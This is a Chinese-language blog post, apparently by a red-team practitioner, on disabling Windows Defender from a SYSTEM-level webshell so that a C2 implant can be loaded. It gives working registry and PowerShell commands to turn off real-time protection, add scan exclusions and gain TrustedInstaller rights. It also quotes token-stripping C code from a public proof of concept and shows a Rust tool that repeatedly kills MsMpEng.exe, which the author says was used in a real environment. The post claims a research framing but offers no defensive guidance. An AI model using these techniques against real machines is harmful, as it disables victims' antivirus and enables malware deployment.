

<!DOCTYPE html>
<html lang="en" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/fluid.png">
  <link rel="icon" href="/img/fluid.png">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="b11c">
  <meta name="keywords" content="">
  
    <meta name="description" content="Kill Windows Defender一、 前言Windows Defender是一款Windows操作系统内置自带的杀毒软件程序，随着抗病毒技术的发展，模拟渗透测试中，绕过&#x2F;关闭Windows Defender的难度在逐渐增加。 本篇文章是模拟渗透攻防的角度，对一些已经共享的源码进行编译测试，在前者的基础上更好创新新的tips。仅在技术研究的角度介绍Windows Defender">
<meta property="og:type" content="article">
<meta property="og:title" content="Kill Windows Defender">
<meta property="og:url" content="https://b11c.github.io/2023/06/14/KillDefender/index.html">
<meta property="og:site_name" content="b11c">
<meta property="og:description" content="Kill Windows Defender一、 前言Windows Defender是一款Windows操作系统内置自带的杀毒软件程序，随着抗病毒技术的发展，模拟渗透测试中，绕过&#x2F;关闭Windows Defender的难度在逐渐增加。 本篇文章是模拟渗透攻防的角度，对一些已经共享的源码进行编译测试，在前者的基础上更好创新新的tips。仅在技术研究的角度介绍Windows Defender">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://b11c.github.io/2023/06/14/KillDefender/1.png">
<meta property="og:image" content="https://b11c.github.io/2023/06/14/KillDefender/2.png">
<meta property="og:image" content="https://b11c.github.io/2023/06/14/KillDefender/3.png">
<meta property="og:image" content="https://b11c.github.io/2023/06/14/KillDefender/4.png">
<meta property="og:image" content="https://b11c.github.io/2023/06/14/KillDefender/5.png">
<meta property="og:image" content="https://b11c.github.io/2023/06/14/KillDefender/6.png">
<meta property="og:image" content="https://b11c.github.io/2023/06/14/KillDefender/7.png">
<meta property="og:image" content="https://b11c.github.io/2023/06/14/KillDefender/8.png">
<meta property="og:image" content="https://b11c.github.io/2023/06/14/KillDefender/9.png">
<meta property="og:image" content="https://b11c.github.io/2023/06/14/KillDefender/10.png">
<meta property="og:image" content="https://b11c.github.io/2023/06/14/KillDefender/11.png">
<meta property="og:image" content="https://b11c.github.io/2023/06/14/KillDefender/12.png">
<meta property="og:image" content="https://b11c.github.io/2023/06/14/KillDefender/13.png">
<meta property="og:image" content="https://b11c.github.io/2023/06/14/KillDefender/14.png">
<meta property="og:image" content="https://b11c.github.io/2023/06/14/KillDefender/15.png">
<meta property="og:image" content="https://b11c.github.io/2023/06/14/KillDefender/16.png">
<meta property="og:image" content="https://b11c.github.io/2023/06/14/KillDefender/17.png">
<meta property="article:published_time" content="2023-06-14T08:40:51.000Z">
<meta property="article:modified_time" content="2023-06-19T08:57:46.628Z">
<meta property="article:author" content="b11c">
<meta property="article:tag" content="内网">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="https://b11c.github.io/2023/06/14/KillDefender/1.png">
  
  
    <meta name="referrer" content="no-referrer-when-downgrade">
  
  
  <title>Kill Windows Defender - b11c</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_hj8rtnfg7um.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_lbnruvf0jn.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"b11c.github.io","root":"/","version":"1.9.4","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"left","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":true,"follow_dnt":true,"baidu":null,"google":null,"gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false}},"search_path":"/local-search.xml"};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  

  

  

  

  

  

  

  



  
<meta name="generator" content="Hexo 6.3.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>b11c</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                <span>Home</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                <span>Archives</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                <span>Categories</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                <span>Tags</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                <span>About</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/default.png') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="Kill Windows Defender"></span>
          
        </div>

        
          
  <div class="mt-3">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-author" aria-hidden="true"></i>
        b11c
      </span>
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2023-06-14 16:40" pubdate>
          June 14, 2023 pm
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          5.5k words
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          46 mins
        
      </span>
    

    
    
      
        <span id="busuanzi_container_page_pv" style="display: none">
          <i class="iconfont icon-eye" aria-hidden="true"></i>
          <span id="busuanzi_value_page_pv"></span>次
        </span>
        
      
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="padding-left: 2rem; margin-right: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>Table of Contents</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">Kill Windows Defender</h1>
            
            
              <div class="markdown-body">
                
                <h1 id="Kill-Windows-Defender"><a href="#Kill-Windows-Defender" class="headerlink" title="Kill Windows Defender"></a>Kill Windows Defender</h1><h2 id="一、-前言"><a href="#一、-前言" class="headerlink" title="一、 前言"></a>一、 前言</h2><p>Windows Defender是一款Windows操作系统内置自带的杀毒软件程序，随着抗病毒技术的发展，模拟渗透测试中，绕过&#x2F;关闭Windows Defender的难度在逐渐增加。</p>
<p>本篇文章是模拟渗透攻防的角度，对一些已经共享的源码进行编译测试，在前者的基础上更好创新新的tips。仅在技术研究的角度介绍Windows Defender相关的渗透方法，分析利用思路，给出防护参考建议。</p>
<h2 id="二、-场景"><a href="#二、-场景" class="headerlink" title="二、 场景"></a>二、 场景</h2><p><strong>假设场景：</strong></p>
<figure class="highlight armasm"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs armasm">从webshell管理工具角度（以“哥斯拉”为例子）去kill windows defender（靶场环境中），攻防对抗中获取了webshell，但是对方机器上存在windows <span class="hljs-number">10</span> defender杀软，当前权限是：system权限，如何绕过或者关闭defender，让<span class="hljs-built_in">C2</span>的马传上去—上线（假设你不会<span class="hljs-built_in">C2</span>免杀，如何操作？），就是只能关闭/绕过defender。<br></code></pre></td></tr></table></figure>

<img src="/2023/06/14/KillDefender/1.png" srcset="/img/loading.gif" lazyload class="" title="This is an example image">

<p>假如是你遇到这种场景，需要如何操作？？？</p>
<h2 id="三、相关操作"><a href="#三、相关操作" class="headerlink" title="三、相关操作"></a>三、相关操作</h2><h3 id="0x00-查看windows-defender版本-——-webshell角度"><a href="#0x00-查看windows-defender版本-——-webshell角度" class="headerlink" title="0x00 查看windows defender版本 —— webshell角度"></a>0x00 查看windows defender版本 —— webshell角度</h3><ul>
<li><strong>cmd命令行查看：</strong></li>
</ul>
<blockquote>
<p>dir “C:\ProgramData\Microsoft\Windows Defender\Platform&quot; &#x2F;od &#x2F;ad &#x2F;b</p>
</blockquote>
<img src="/2023/06/14/KillDefender/2.png" srcset="/img/loading.gif" lazyload class="" title="This is an example image">

<p>结果：版本4.18.23050.3-0 （数字大的为最新版本）</p>
<h3 id="0x01-查看已存在的查杀排除列表"><a href="#0x01-查看已存在的查杀排除列表" class="headerlink" title="0x01 查看已存在的查杀排除列表"></a>0x01 查看已存在的查杀排除列表</h3><p>如果存在查杀排除项，直接将C2的马上传到这个排除项，执行马C2直接上线，这是最理想的环境下。</p>
<ul>
<li><strong>查看排除项：(administrator权限下)</strong></li>
</ul>
<blockquote>
<p>reg query “HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions” &#x2F;s</p>
<p>或者：</p>
<p>reg query “HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\paths”</p>
</blockquote>
<img src="/2023/06/14/KillDefender/3.png" srcset="/img/loading.gif" lazyload class="" title="This is an example image">

<p>本机administrator权限下：</p>
<img src="/2023/06/14/KillDefender/4.png" srcset="/img/loading.gif" lazyload class="" title="This is an example image">

<ul>
<li><strong>Powershell窗口查看：(administrator权限下)</strong></li>
</ul>
<blockquote>
<p>Get-MpPreference | select ExclusionPath</p>
</blockquote>
<img src="/2023/06/14/KillDefender/5.png" srcset="/img/loading.gif" lazyload class="" title="This is an example image">

<p>结果：没有排除项，这个点不能利用。</p>
<h3 id="0x02-关闭和开启Windows-Defender的Real-time-protection"><a href="#0x02-关闭和开启Windows-Defender的Real-time-protection" class="headerlink" title="0x02 关闭和开启Windows Defender的Real-time protection"></a>0x02 关闭和开启Windows Defender的Real-time protection</h3><p>本机电脑可以从面板快速关闭Real-time protection，操作：Windows Security—&gt;Virus &amp; theat protection settings—&gt;关闭Real-time protection。</p>
<ul>
<li><strong>通过命令行关闭：(需要关闭Tamper Protection和TrustedInstaller权限下 —— 缺一不可)</strong></li>
</ul>
<blockquote>
<p>reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection” &#x2F;v “DisableRealtimeMonitoring” &#x2F;d 1 &#x2F;t REG_DWORD &#x2F;f</p>
<p>运行成功时，桌面右下角会弹框提示Windows Defender已关闭</p>
</blockquote>
<ul>
<li><strong>通过命令行开启：(需要关闭Tamper Protection和TrustedInstaller权限下 —— 缺一不可)</strong></li>
</ul>
<blockquote>
<p>reg delete “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection” &#x2F;v “DisableRealtimeMonitoring” &#x2F;f</p>
</blockquote>
<ul>
<li><strong>通过Powershell关闭Real-time protection：(新版windows不适用)</strong></li>
</ul>
<blockquote>
<p>Set-MpPreference -DisableRealtimeMonitoring $true</p>
</blockquote>
<p><strong>分析：基于webshell的角度下，TrustedInstaller权限是很难获取的——基本是获取不到的，所以这个操作是不可行的，但是为啥要了解呢？知其才能更好绕过&#x2F;关闭defender。</strong></p>
<h3 id="0x03-获得TrustedInstaller权限"><a href="#0x03-获得TrustedInstaller权限" class="headerlink" title="0x03 获得TrustedInstaller权限"></a>0x03 获得TrustedInstaller权限</h3><p>关闭和开启Real-time protection，都需要TrustedInstaller权限，并且关闭Tamper Protection，才能实现。</p>
<ul>
<li><strong><a target="_blank" rel="noopener" href="https://www.nirsoft.net/utils/advanced_run.html">AdvancedRun</a>获取</strong>：</li>
</ul>
<blockquote>
<p>AdvancedRun.exe &#x2F;EXEFilename “%windir%\system32\cmd.exe” &#x2F;CommandLine ‘&#x2F;c reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection” &#x2F;v “DisableRealtimeMonitoring” &#x2F;d 1 &#x2F;t REG_DWORD &#x2F;f’ &#x2F;RunAs 8 &#x2F;Run</p>
</blockquote>
<h3 id="0x04-关闭-x2F-开启Tamper-Protection"><a href="#0x04-关闭-x2F-开启Tamper-Protection" class="headerlink" title="0x04 关闭&#x2F;开启Tamper Protection"></a>0x04 关闭&#x2F;开启Tamper Protection</h3><h4 id="4-1-Windows-Defender开启前提下："><a href="#4-1-Windows-Defender开启前提下：" class="headerlink" title="4.1 Windows Defender开启前提下："></a>4.1 Windows Defender开启前提下：</h4><ul>
<li><strong>通过命令行关闭 ——Tamper Protection方法：(administrator权限)</strong></li>
</ul>
<blockquote>
<p>reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Features” &#x2F;v “TamperProtection” &#x2F;d 4 &#x2F;t REG_DWORD &#x2F;f</p>
<p>PS:  数值5代表开启，数值4代表关闭</p>
</blockquote>
<p>​      <strong>结果:</strong> </p>
<img src="/2023/06/14/KillDefender/6.png" srcset="/img/loading.gif" lazyload class="" title="This is an example image">

<p>​      <strong>分析：</strong> 无法修改，无法通过修改注册表的方式去设置Tamper Protection，只能通过面板进行修改</p>
<ul>
<li><strong>查看Tamper Protection当前状态：(任何权限下都可)</strong></li>
</ul>
<blockquote>
<p>reg query “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Features” &#x2F;v “TamperProtection”</p>
</blockquote>
<h4 id="4-2-Windows-Defender开启但Tamper-Protection关闭前提下："><a href="#4-2-Windows-Defender开启但Tamper-Protection关闭前提下：" class="headerlink" title="4.2 Windows Defender开启但Tamper Protection关闭前提下："></a>4.2 Windows Defender开启但Tamper Protection关闭前提下：</h4><img src="/2023/06/14/KillDefender/7.png" srcset="/img/loading.gif" lazyload class="" title="This is an example image">

<ul>
<li><strong>通过命令行开启——Tamper Protection方法：(administrator权限)</strong></li>
</ul>
<blockquote>
<p>reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Features” &#x2F;v “TamperProtection” &#x2F;d 5 &#x2F;t REG_DWORD &#x2F;f</p>
<p>PS:  数值5代表开启，数值4代表关闭</p>
</blockquote>
<p>​    结果：无法操作</p>
<img src="/2023/06/14/KillDefender/8.png" srcset="/img/loading.gif" lazyload class="" title="This is an example image">



<h4 id="4-3-实战下defender关闭的情况下："><a href="#4-3-实战下defender关闭的情况下：" class="headerlink" title="4.3 实战下defender关闭的情况下："></a>4.3 实战下defender关闭的情况下：</h4><p>实战中利用免杀的kill Windows defender，在关闭defender场景下，尝试关闭&#x2F;开启Tamper Protection。</p>
<p>A. 关闭Tamper Protection：</p>
<img src="/2023/06/14/KillDefender/9.png" srcset="/img/loading.gif" lazyload class="" title="This is an example image">

<p>B. 开启Tamper Protection：</p>
<img src="/2023/06/14/KillDefender/10.png" srcset="/img/loading.gif" lazyload class="" title="This is an example image">



<h4 id="4-4-结论："><a href="#4-4-结论：" class="headerlink" title="4.4 结论："></a>4.4 结论：</h4><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs sql">（<span class="hljs-number">1</span>）当Tamper Protection开启时，用户将无法通过注册表、Powershell和组策略修改Windows Defender的配置；<br>（<span class="hljs-number">2</span>）当Tamper Protection关闭时，用户无法通过cmd注册表表启动，只能界面下开启。<br>（<span class="hljs-number">3</span>）通过Powershell关闭Windows Defender的<span class="hljs-type">Real</span><span class="hljs-operator">-</span><span class="hljs-type">time</span> protection: <span class="hljs-keyword">Set</span><span class="hljs-operator">-</span>MpPreference <span class="hljs-operator">-</span>DisableRealtimeMonitoring $<span class="hljs-literal">true</span> 已经不适用，尤其是在新的windows<br></code></pre></td></tr></table></figure>



<h3 id="0x05-添加查杀排除列表"><a href="#0x05-添加查杀排除列表" class="headerlink" title="0x05 添加查杀排除列表"></a>0x05 添加查杀排除列表</h3><p>如果某个目标存在排除项(administrator权限)，不了解defender的机制时，会尝试将C2的马添加到排除项的操作（前提不会免杀）</p>
<h4 id="5-1-通过命令行添加"><a href="#5-1-通过命令行添加" class="headerlink" title="5.1 通过命令行添加"></a>5.1 通过命令行添加</h4><p><strong>利用条件：需要TrustedInstaller权限</strong></p>
<blockquote>
<p>reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths” &#x2F;v “B:&quot; &#x2F;d 0 &#x2F;t REG_DWORD &#x2F;f</p>
</blockquote>
<h4 id="5-2通过Powershell添加"><a href="#5-2通过Powershell添加" class="headerlink" title="5.2通过Powershell添加"></a>5.2通过Powershell添加</h4><p><strong>利用条件：需要administrator权限</strong></p>
<p><strong>利用脚本：<a target="_blank" rel="noopener" href="https://docs.microsoft.com/en-us/powershell/module/defender/add-mppreference?view=windowsserver2022-ps">添加排除的脚本</a></strong></p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs powershell">添加排除项列表：<br><span class="hljs-built_in">Add-MpPreference</span> <span class="hljs-literal">-ExclusionPath</span> <span class="hljs-string">&quot;B:\&quot;</span><br><br>删除排除列表：<br><span class="hljs-built_in">Remove-MpPreference</span> <span class="hljs-literal">-ExclusionPath</span> <span class="hljs-string">&quot;B:\&quot;</span><br></code></pre></td></tr></table></figure>

<h4 id="5-3-总结："><a href="#5-3-总结：" class="headerlink" title="5.3 总结："></a>5.3 总结：</h4><p>实战Get  webshell 下利用添加到排除项的方法—— 不可行</p>
<h3 id="0x06-移除Token导致Windows-Defender失效-（是当下主流的方法）"><a href="#0x06-移除Token导致Windows-Defender失效-（是当下主流的方法）" class="headerlink" title="0x06 移除Token导致Windows Defender失效 （是当下主流的方法）"></a>0x06 移除Token导致Windows Defender失效 （是当下主流的方法）</h3><h4 id="6-1-原理"><a href="#6-1-原理" class="headerlink" title="6.1 原理"></a>6.1 原理</h4><ol>
<li>Windows Defender进程为MsMpEng.exe；</li>
<li>MsMpEng.exe是一个受保护的进程(Protected Process Light，简写为PPL)；</li>
<li>非PPL进程无法获取PPL进程的句柄，导致我们无法直接结束PPL进程MsMpEng.exe；</li>
<li>但是我们能够以system权限运行的线程修改进程MsMpEng.exe的token；</li>
<li>当我们移除进程MsMpEng.exe的所有token后，进程MsMpEng.exe无法访问其他进程的资源，也就无法检测其他进程是否有害，最终导致Windows Defender失效。</li>
</ol>
<h4 id="6-2-利用github共享去kill-defender"><a href="#6-2-利用github共享去kill-defender" class="headerlink" title="6.2 利用github共享去kill defender"></a>6.2 利用github共享去kill defender</h4><h5 id="A-POC：pwn1sher"><a href="#A-POC：pwn1sher" class="headerlink" title="A. POC：pwn1sher"></a>A. POC：<a target="_blank" rel="noopener" href="https://github.com/pwn1sher/KillDefender">pwn1sher</a></h5><p><strong>利用前提：system权限</strong></p>
<p>（1）本地主机开启denfender + Process Hacker 对defender的MsMpEng.exe进程跟进查看：</p>
<img src="/2023/06/14/KillDefender/11.png" srcset="/img/loading.gif" lazyload class="" title="This is an example image">



<p>（2）编译 pwn1sher的源码</p>
<p>编译结果：无法获取到token</p>
<img src="/2023/06/14/KillDefender/12.png" srcset="/img/loading.gif" lazyload class="" title="This is an example image">

<p>源代码中核心的语句：</p>
<figure class="highlight reasonml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><code class="hljs reasonml"><span class="hljs-comment">// printf(&quot;%p\n&quot;, phandle);</span><br><br>    HANDLE ptoken;<br><br>    BOOL token = <span class="hljs-constructor">OpenProcessToken(<span class="hljs-params">phandle</span>, TOKEN_ALL_ACCESS, &amp;<span class="hljs-params">ptoken</span>)</span>;<br><br>    <span class="hljs-keyword">if</span> (token) &#123;<br>        printf(<span class="hljs-string">&quot;[*] Opened Target Token Handle\n&quot;</span>);<br>    &#125;<br>    <span class="hljs-keyword">else</span> &#123;<br>        printf(<span class="hljs-string">&quot;[-] Failed to open Token Handle\n&quot;</span>);<br>    &#125;<br><br>    <span class="hljs-constructor">LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &amp;<span class="hljs-params">sedebugnameValue</span>)</span>;<br><br><br>    TOKEN_PRIVILEGES tkp;<br><br>    tkp.PrivilegeCount = <span class="hljs-number">1</span>;<br>    tkp.Privileges<span class="hljs-literal">[<span class="hljs-number">0</span>]</span>.Luid = sedebugnameValue;<br>    tkp.Privileges<span class="hljs-literal">[<span class="hljs-number">0</span>]</span>.Attributes = SE_PRIVILEGE_ENABLED;<br><br>    <span class="hljs-keyword">if</span> (!<span class="hljs-constructor">AdjustTokenPrivileges(<span class="hljs-params">ptoken</span>, FALSE, &amp;<span class="hljs-params">tkp</span>, <span class="hljs-params">sizeof</span>(<span class="hljs-params">tkp</span>)</span>, NULL, NULL)) &#123;<br><br>        printf(<span class="hljs-string">&quot;[-] Failed to Adjust Token&#x27;s Privileges\n&quot;</span>);<br>        return <span class="hljs-number">0</span>;<br>    &#125;<br>    <br>分析：<br>   Process Hacker对<span class="hljs-module-access"><span class="hljs-module"><span class="hljs-identifier">MsMpEng</span>.</span></span>exe进程跟进查看已经无法查看defender的token值了，微软修补了，导致当脚本调用获取token时失败。<br></code></pre></td></tr></table></figure>

<p>（3）不管是普通用户还是system权限下，去kill defender将报错，如下：</p>
<figure class="highlight stata"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs stata">[-] Failed to <span class="hljs-keyword">open</span> <span class="hljs-keyword">Token</span> Handle<br>[-] Failed to <span class="hljs-keyword">Adjust</span> <span class="hljs-keyword">Token</span>&#x27;s Privileges<br></code></pre></td></tr></table></figure>

<p><strong>总结：</strong></p>
<p>​      <a target="_blank" rel="noopener" href="https://github.com/pwn1sher/KillDefender">pwn1sher</a> kill windows defender已经无效，但是代码的逻辑值得思考。</p>
<h5 id="B-其他开源"><a href="#B-其他开源" class="headerlink" title="B.其他开源"></a>B.其他开源</h5><figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs awk">https:<span class="hljs-regexp">//gi</span>thub.com<span class="hljs-regexp">/Octoberfest7/</span>KillDefender<br>https:<span class="hljs-regexp">//gi</span>thub.com<span class="hljs-regexp">/Octoberfest7/</span>KDStab<br></code></pre></td></tr></table></figure>

<p><strong>结论</strong>：经过测试，都是利用移除Token，现在都不能kill denfender。</p>
<h3 id="0x07-一款新的Kill-Windows-Defender工具"><a href="#0x07-一款新的Kill-Windows-Defender工具" class="headerlink" title="0x07 一款新的Kill Windows Defender工具"></a>0x07 一款新的Kill Windows Defender工具</h3><h4 id="7-1-b1-team：superman（rust）"><a href="#7-1-b1-team：superman（rust）" class="headerlink" title="7.1 b1-team：superman（rust）"></a>7.1 <a target="_blank" rel="noopener" href="https://github.com/b1-team/superman">b1-team：superman</a>（rust）</h4><p>利用：rust源码编译成exe可执行文件，测试及结果：</p>
<p>（1）<strong>测试前</strong>：</p>
<img src="/2023/06/14/KillDefender/13.png" srcset="/img/loading.gif" lazyload class="" title="This is an example image">


<p>（2）<strong>运行后</strong>：superman.exe -p 2884 -r  （-r：利用递归关闭denfender）</p>
<p>弹出是否需要运行该程序</p>
<img src="/2023/06/14/KillDefender/14.png" srcset="/img/loading.gif" lazyload class="" title="This is an example image">




<p><strong>结果</strong>：</p>
<img src="/2023/06/14/KillDefender/15.png" srcset="/img/loading.gif" lazyload class="" title="This is an example image">




<p><strong>尝试重启defender</strong>： 一直递归杀死MsMpEng.exe</p>
<img src="/2023/06/14/KillDefender/16.png" srcset="/img/loading.gif" lazyload class="" title="This is an example image">


<p>如果想开启difender，需要关闭&#x2F;kill superman.exe程序才能启动成功。</p>
<p><strong>kill superman.exe后</strong>：</p>
<img src="/2023/06/14/KillDefender/17.png" srcset="/img/loading.gif" lazyload class="" title="This is an example image">



<p>真实环境：可以使用，并且使用了，这里就不展示了。</p>
<h3 id="0x08-思考"><a href="#0x08-思考" class="headerlink" title="0x08 思考"></a>0x08 思考</h3><p> 实战下的免杀太重要了，不管是基于底层语言（C、C++、C#）还是小众语言（golang、rust）免杀，如果思路足够骚，就很牛。</p>
<p>1、rust语言后边的免杀板块发展需求会很大，是不是该学习rust语言（因为会rust的人很少，rust是可以开发内核的语言）；</p>
<p>2、所以不会语言的red team是一个失去翅膀，会飞不高飞不远的红队。</p>
<p>3、kill windows defender是一个常遇到的场景，当一个团队没有免杀，会增加渗透的时间成本。</p>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
    <div class="post-meta mr-3 d-flex align-items-center">
      <i class="iconfont icon-category"></i>
      

<span class="category-chains">
  
  
    
      <span class="category-chain">
        
  <a href="/categories/Kill-Defender/" class="category-chain-item">Kill Defender</a>
  
  

      </span>
    
  
</span>

    </div>
  
  
    <div class="post-meta">
      <i class="iconfont icon-tags"></i>
      
        <a href="/tags/%E5%86%85%E7%BD%91/">#内网</a>
      
    </div>
  
</div>


              

              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2023/06/12/%E5%86%85%E7%BD%91%E5%B8%B8%E7%94%A8%E5%91%BD%E4%BB%A4/" title="内网渗透中常用命令">
                        <span class="hidden-mobile">内网渗透中常用命令</span>
                        <span class="visible-mobile">Next</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">Search</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
